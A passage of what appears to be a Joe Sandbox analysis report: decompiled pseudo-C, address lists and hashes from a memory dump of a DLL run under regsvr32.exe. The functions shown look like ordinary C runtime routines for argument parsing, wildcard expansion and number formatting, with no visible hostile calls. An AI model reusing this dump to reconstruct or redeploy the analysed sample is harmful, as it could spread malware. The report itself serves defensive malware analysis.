									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E6E4610BE(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E6E4681C0(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E6E4610BE( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E6E4610BE(_t283);
						goto L31;
					}
				} else {
					_t219 = E6E4602B2(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E6E45D63C();
					L31:
					return _t297;
				}
				L81:
			}

0x6e462d69
0x6e462d6c
0x6e462d6f
0x6e462d70
0x6e462d72
0x6e462d88
0x6e462d8c
0x6e462d8f
0x6e462d91
0x6e462d93
0x6e462d95
0x6e462d97
0x6e462d9a
0x6e462d9d
0x6e462da0
0x6e462da2
0x6e462e05
0x6e462e07
0x6e462e0a
0x6e462e0c
0x6e462e10
0x6e462e19
0x6e462e1a
0x6e462e1d
0x6e462e1f
0x6e462e22
0x6e462e26
0x6e462e26
0x6e462e28
0x6e462e2a
0x6e462e2c
0x6e462e2e
0x6e462e2e
0x6e462e30
0x6e462e33
0x6e462e36
0x6e462e36
0x6e462e38
0x6e462e39
0x6e462e39
0x6e462e44
0x6e462e46
0x6e462e49
0x6e462e4a
0x6e462e4d
0x6e462e4d
0x6e462e51
0x6e462e54
0x6e462e57
0x6e462e57
0x6e462e57
0x6e462e64
0x6e462e66
0x6e462e69
0x6e462e6b
0x6e462e83
0x6e462e86
0x6e462e89
0x6e462e8b
0x6e462e8e
0x6e462e90
0x6e462e93
0x6e462e96
0x6e462ef3
0x6e462ef6
0x6e462ef9
0x6e462efb
0x00000000
0x6e462e98
0x6e462e9a
0x6e462e9a
0x6e462e9c
0x6e462e9f
0x6e462e9f
0x6e462ea1
0x6e462ea3
0x6e462ea9
0x6e462eac
0x6e462eac
0x6e462eae
0x6e462eaf
0x6e462eaf
0x6e462eb6
0x6e462eb9
0x6e462ebd
0x6e462eca
0x6e462ecf
0x6e462ed2
0x6e462ed4
0x6e462f48
0x6e462f49
0x6e462f4a
0x6e462f4b
0x6e462f4c
0x6e462f4d
0x6e462f52
0x6e462f56
0x6e462f58
0x6e462f59
0x6e462f5c
0x6e462f5c
0x6e462f5f
0x6e462f5f
0x6e462f61
0x6e462f62
0x6e462f62
0x6e462f66
0x6e462f67
0x6e462f6e
0x6e462f71
0x6e462f74
0x6e462f76
0x6e462f7e
0x6e462f7f
0x6e462f80
0x6e462f83
0x6e462f8d
0x6e462f91
0x6e462f93
0x6e462fa7
0x6e462fa7
0x6e462faa
0x6e462fb4
0x6e462fb9
0x6e462fbc
0x6e462fbe
0x00000000
0x6e462fc0
0x6e462fc0
0x6e462fc5
0x6e462fcc
0x6e462fcf
0x6e462fd1
0x6e462fe2
0x6e462fe4
0x6e462fe6
0x6e462fe6
0x6e462fe6
0x6e462fd3
0x6e462fd4
0x6e462fd9
0x6e462fdc
0x6e462feb
0x6e462ff1
0x00000000
0x6e462ff4
0x6e462f95
0x6e462f95
0x6e462f9b
0x6e462fa0
0x6e462fa3
0x6e462fa5
0x6e462ff7
0x6e462ff9
0x6e462ffa
0x6e462ffb
0x6e462ffc
0x6e462ffd
0x6e462ffe
0x6e463003
0x6e463006
0x6e463007
0x6e463009
0x6e46300f
0x6e463016
0x6e463019
0x6e46301c
0x6e46301f
0x6e463020
0x6e463021
0x6e463024
0x6e46302a
0x6e46302c
0x6e46302e
0x6e46302e
0x6e463030
0x6e463032
0x00000000
0x00000000
0x6e463034
0x6e463036
0x6e463038
0x6e46303a
0x6e463045
0x6e463047
0x6e463049
0x00000000
0x00000000
0x6e463049
0x6e46303a
0x00000000
0x6e463036
0x6e46304b
0x6e46304b
0x6e463051
0x6e463053
0x6e463059
0x6e46305b
0x6e46307d
0x6e46307d
0x6e46307f
0x6e463081
0x6e46308d
0x6e46308d
0x6e463083
0x6e463083
0x6e463085
0x00000000
0x6e463087
0x6e463087
0x6e463089
0x6e46308b
0x00000000
0x00000000
0x6e46308b
0x6e463085
0x6e463095
0x6e46309d
0x6e4630a3
0x6e4630a4
0x6e4630a6
0x6e4630ae
0x6e4630b4
0x6e4630ba
0x6e4630c0
0x6e4630d4
0x6e4630d9
0x6e4630e4
0x6e4630f4
0x6e4630fa
0x6e4630fc
0x6e4630ff
0x6e463122
0x6e463122
0x6e463127
0x6e46312d
0x6e46312d
0x6e463133
0x6e463139
0x6e46313f
0x6e463145
0x6e46314b
0x6e46316c
0x6e463171
0x6e463176
0x6e46317a
0x6e463180
0x6e463183
0x6e463196
0x6e463196
0x6e46319c
0x6e4631a2
0x6e4631a3
0x6e4631a4
0x6e4631a9
0x6e4631ac
0x6e4631b2
0x6e4631b4
0x6e463212
0x6e463218
0x6e463220
0x6e463225
0x6e46322b
0x6e46322c
0x00000000
0x00000000
0x00000000
0x6e463185
0x6e463185
0x6e463188
0x6e46318a
0x00000000
0x6e46318c
0x6e46318c
0x6e46318f
0x00000000
0x6e463191
0x6e463191
0x6e463194
0x00000000
0x00000000
0x00000000
0x00000000
0x6e463194
0x6e46318f
0x6e46318a
0x6e46322e
0x6e46322f
0x00000000
0x6e4631b6
0x6e4631b6
0x6e4631bc
0x6e4631c4
0x6e4631c9
0x6e4631d8
0x6e4631d8
0x6e4631e0
0x6e4631e6
0x6e4631ec
0x6e4631f3
0x6e4631f6
0x6e4631f8
0x6e463208
0x6e46320d
0x00000000
0x6e463101
0x6e463101
0x6e463107
0x6e463108
0x6e463109
0x6e46310a
0x6e463112
0x6e463112
0x6e463235
0x6e463235
0x6e46323c
0x6e46323d
0x6e463245
0x6e46324a
0x6e46324b
0x6e46305d
0x6e46305d
0x6e463060
0x6e463062
0x6e463077
0x00000000
0x6e463064
0x6e463064
0x6e463067
0x6e463068
0x6e463069
0x6e46306a
0x6e46306f
0x6e463062
0x6e463250
0x6e463251
0x6e463253
0x6e46325a
0x00000000
0x00000000
0x00000000
0x6e462fa5
0x6e462f78
0x6e462f7a
0x6e462f7b
0x6e462f7d
0x6e462f7d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e462ed6
0x6e462ed6
0x6e462edc
0x6e462edf
0x6e462ee2
0x6e462ee5
0x6e462ee8
0x6e462eeb
0x6e462eee
0x6e462eee
0x00000000
0x6e462e9f
0x6e462e6d
0x6e462e6d
0x6e462e70
0x6e462efd
0x6e462efe
0x6e462f03
0x00000000
0x6e462f03
0x6e462da4
0x6e462da4
0x6e462da7
0x6e462daf
0x6e462db2
0x6e462db9
0x6e462dbb
0x6e462dbd
0x6e462dd8
0x6e462dd9
0x6e462dda
0x6e462ddb
0x6e462de0
0x6e462de3
0x6e462de6
0x6e462dbf
0x6e462dbf
0x6e462dc2
0x6e462dc3
0x6e462dc4
0x6e462dc5
0x6e462dc6
0x6e462dcb
0x6e462dcd
0x6e462dd0
0x6e462dd0
0x6e462de8
0x6e462dea
0x00000000
0x00000000
0x6e462df3
0x6e462df6
0x6e462df9
0x6e462dfb
0x6e462dfd
0x00000000
0x6e462dff
0x6e462dff
0x6e462e02
0x00000000
0x6e462e02
0x00000000
0x6e462dfd
0x6e462e78
0x6e462f04
0x6e462f07
0x6e462f0b
0x6e462f14
0x6e462f17
0x6e462f1b
0x6e462f1b
0x6e462f1d
0x6e462f20
0x6e462f22
0x6e462f24
0x6e462f26
0x6e462f2b
0x6e462f2c
0x6e462f30
0x6e462f30
0x6e462f34
0x6e462f37
0x6e462f37
0x6e462f3b
0x00000000
0x6e462f42
0x6e462d74
0x6e462d74
0x6e462d7b
0x6e462d7c
0x6e462d7e
0x6e462f43
0x6e462f47
0x6e462f47
0x00000000

APIs

_free.LIBCMT ref: 6E462EFE

Strings

*?, xrefs: 6E462DA7

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: e62a7b5681f75c7ea2167378dfd03fc01b53014849d62c1fc6ca275206def071
Instruction ID: 42b3a1e9b1d653039bbd3227fbce37e50d60ba6d301618cd301f41cb2ce08a39
Opcode Fuzzy Hash: e62a7b5681f75c7ea2167378dfd03fc01b53014849d62c1fc6ca275206def071
Instruction Fuzzy Hash: 6F614CB5E04219AFDB14CFE9C8809DDFBF9EF48314B25856AE814E7304DB71AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 6E45F0E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E45F0E8(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E6E463A9B(_t48);
						E6E4634E2(_t48, _t57, 0, 0x6e475418, 0, 0x6e475418, 0x104);
						_t26 =  *0x6e4759b8; // 0x722a68
						 *0x6e4759a8 = 0x6e475418;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6e475418;
							_v20 = 0x6e475418;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6E45F392(E6E45F21E( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6E45F21E( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6E4633D5(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6e4759ac = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6e4759b0 = _t58;
											L18:
											E6E4610BE(_t37);
											_v12 = 0;
											L19:
											E6E4610BE(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6e4759ac = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6e4759b0 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6E4602B2(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6E4602B2(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6E45D63C();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6e45f0e8
0x6e45f0f1
0x6e45f0f6
0x6e45f100
0x6e45f103
0x6e45f120
0x6e45f121
0x6e45f134
0x6e45f139
0x6e45f141
0x6e45f147
0x6e45f14a
0x6e45f14c
0x6e45f153
0x6e45f153
0x6e45f155
0x6e45f158
0x6e45f15b
0x6e45f162
0x6e45f17b
0x6e45f180
0x6e45f182
0x6e45f1a3
0x6e45f1ab
0x6e45f1ae
0x6e45f1c9
0x6e45f1cc
0x6e45f1d3
0x6e45f1d7
0x6e45f1d9
0x6e45f1e0
0x6e45f1e3
0x6e45f1e5
0x6e45f1e7
0x6e45f1e9
0x6e45f1f3
0x6e45f1f3
0x6e45f1f5
0x6e45f1fb
0x6e45f1fe
0x6e45f200
0x6e45f206
0x6e45f207
0x6e45f20d
0x6e45f210
0x6e45f211
0x6e45f217
0x6e45f21a
0x00000000
0x00000000
0x00000000
0x00000000
0x6e45f1eb
0x6e45f1eb
0x6e45f1eb
0x6e45f1ee
0x6e45f1ef
0x6e45f1ef
0x00000000
0x6e45f1eb
0x6e45f1db
0x00000000
0x6e45f1db
0x6e45f1b3
0x6e45f1b3
0x6e45f1b4
0x6e45f1b9
0x6e45f1bb
0x6e45f1bd
0x6e45f1c2
0x6e45f1c2
0x00000000
0x6e45f1c2
0x6e45f184
0x6e45f189
0x6e45f18b
0x6e45f18c
0x00000000
0x6e45f18c
0x6e45f14e
0x6e45f151
0x00000000
0x00000000
0x00000000
0x6e45f151
0x6e45f105
0x6e45f108
0x00000000
0x00000000
0x6e45f10a
0x6e45f111
0x6e45f112
0x6e45f114
0x6e45f119
0x00000000
0x6e45f119
0x00000000

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6E45F12B, 6E45F132, 6E45F168
h*r, xrefs: 6E45F139

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe$h*r
API String ID: 0-2788153757
Opcode ID: f5775fb58afc3f6e23b0fd96aec9cb3ff72978cce521781128778619d96662bc
Instruction ID: 41f78c53def1a0094ffec370eb5799de0e37d9e75195e2d8ca2c89660da10b0e
Opcode Fuzzy Hash: f5775fb58afc3f6e23b0fd96aec9cb3ff72978cce521781128778619d96662bc
Instruction Fuzzy Hash: 524180B1A02655AFDB11DBFAD880D9EBBBCEB85314F20446BE414D7300E7B19E51CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E461FF7 Relevance: 6.3, APIs: 4, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E461FF7(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E6E45DD26( &_v60, _t163, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t18 = _t177 + 1; // 0x6e45e395
							_t165 = _t18;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t26 =  &(_t165[0]); // 0x6e45e395
								_t178 = _t26;
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E6E45A6A0( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E6E462812(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t50 = _t178 - 1; // 0x6e45e395
									_t118 = _t50;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E6E45B880(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E6E45A6A0( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E6E46AB10();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E6E46AB10();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E6E46AB10();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E6E462306(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E6E46ACD0(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E6E4602B2(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E6E45D63C();
				goto L66;
			}

0x6e461ff7
0x6e462002
0x6e462007
0x6e462009
0x6e462009
0x6e46200d
0x6e462016
0x6e462018
0x6e46201d
0x6e462020
0x6e462023
0x6e462039
0x6e46203c
0x6e462041
0x6e46204b
0x6e462050
0x6e4620a7
0x6e4620a9
0x6e4620b8
0x6e4620bb
0x6e4620bb
0x6e4620be
0x6e4620c0
0x6e4620c7
0x6e4620d9
0x6e4620dc
0x6e4620e1
0x6e4620e5
0x6e4620e6
0x6e462106
0x6e462109
0x6e462109
0x6e462109
0x6e46210b
0x6e46210b
0x6e46210b
0x6e46210e
0x6e462111
0x6e462113
0x6e462124
0x6e462115
0x6e462115
0x6e462115
0x6e462126
0x6e46212b
0x6e46212b
0x6e462130
0x6e462133
0x6e46213d
0x6e46213f
0x6e462141
0x6e462146
0x6e462147
0x6e46214a
0x6e46214d
0x6e462150
0x6e462150
0x6e462152
0x00000000
0x00000000
0x6e462169
0x6e462170
0x6e462174
0x6e462177
0x6e46217a
0x6e46217c
0x6e46217c
0x6e46217c
0x6e462182
0x6e462185
0x6e462189
0x6e46218b
0x6e46218f
0x6e462192
0x6e462195
0x6e462196
0x6e462199
0x6e46219c
0x6e46219f
0x6e46219f
0x6e4621a4
0x6e4621a7
0x6e4621aa
0x00000000
0x00000000
0x6e4621b3
0x6e4621b8
0x6e4621bb
0x6e4621bd
0x00000000
0x00000000
0x6e4621c1
0x6e4621c1
0x6e4621c4
0x6e4621c5
0x6e4621c5
0x6e4621c7
0x6e4621ca
0x00000000
0x00000000
0x6e4621cc
0x6e4621cf
0x6e4621d6
0x6e4621d9
0x6e4621dc
0x6e4621f1
0x6e4621f1
0x6e4621f1
0x6e4621de
0x6e4621de
0x6e4621e1
0x6e4621eb
0x6e4621eb
0x6e4621e3
0x6e4621e6
0x6e4621e6
0x6e4621ed
0x6e4621ed
0x00000000
0x6e4621dc
0x6e4621d1
0x6e4621d1
0x6e4621d3
0x6e4621d3
0x6e462135
0x6e462135
0x6e462137
0x6e4621f4
0x6e4621f4
0x6e4621f6
0x6e4621f8
0x6e4621fb
0x6e4621fc
0x6e4621fd
0x6e4621fe
0x6e462206
0x6e462206
0x6e462208
0x6e462208
0x6e46220b
0x6e46220e
0x6e462211
0x6e462213
0x6e462215
0x6e462215
0x6e462222
0x6e462229
0x6e462230
0x6e462232
0x6e46223b
0x6e46223b
0x6e46223e
0x6e462240
0x6e462243
0x6e462246
0x6e462252
0x6e462252
0x6e462256
0x6e462259
0x6e46225b
0x00000000
0x6e462248
0x6e462248
0x6e46224e
0x6e46224e
0x6e46225c
0x6e46225c
0x6e46225f
0x6e462263
0x6e462264
0x6e462266
0x6e462268
0x6e46226a
0x6e462294
0x6e462294
0x6e462296
0x6e4622a3
0x6e4622a3
0x6e4622a4
0x6e4622a5
0x6e4622a7
0x6e4622a9
0x6e4622ae
0x6e4622b0
0x6e4622b4
0x6e4622b7
0x6e4622ba
0x6e4622bc
0x6e4622bd
0x6e4622bd
0x6e4622bf
0x6e4622bf
0x6e4622c1
0x6e4622ce
0x6e4622ce
0x6e4622cf
0x6e4622d0
0x6e4622d2
0x6e4622d3
0x6e4622d4
0x6e4622dd
0x6e4622e0
0x6e4622e2
0x6e4622e3
0x6e4622e3
0x6e4622e5
0x6e4622e5
0x6e4622e5
0x6e4622e8
0x6e4622ea
0x6e4622ed
0x6e4622ef
0x6e4622f5
0x6e4622fa
0x6e4622fa
0x6e462305
0x6e462305
0x6e4622c3
0x6e4622c5
0x00000000
0x00000000
0x6e4622c7
0x00000000
0x00000000
0x6e4622c9
0x6e4622cc
0x00000000
0x00000000
0x00000000
0x6e4622cc
0x6e462298
0x6e46229a
0x00000000
0x00000000
0x6e46229c
0x00000000
0x00000000
0x6e46229e
0x6e4622a1
0x00000000
0x00000000
0x00000000
0x6e4622a1
0x6e46226c
0x6e462271
0x6e462277
0x6e462277
0x6e462278
0x6e462279
0x6e46227a
0x6e46227c
0x6e462281
0x6e462283
0x6e462285
0x6e46228a
0x6e46228d
0x6e46228f
0x6e462292
0x6e462292
0x00000000
0x6e462292
0x6e462273
0x6e462275
0x00000000
0x00000000
0x00000000
0x6e462275
0x6e46224a
0x6e46224c
0x00000000
0x00000000
0x00000000
0x6e46224c
0x6e462246
0x00000000
0x6e462137
0x6e462133
0x6e4620e8
0x6e4620f4
0x6e4620f4
